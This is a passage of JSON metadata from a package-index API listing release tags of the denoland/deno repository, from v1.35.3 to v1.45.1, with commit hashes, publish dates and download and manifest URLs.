nd/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url"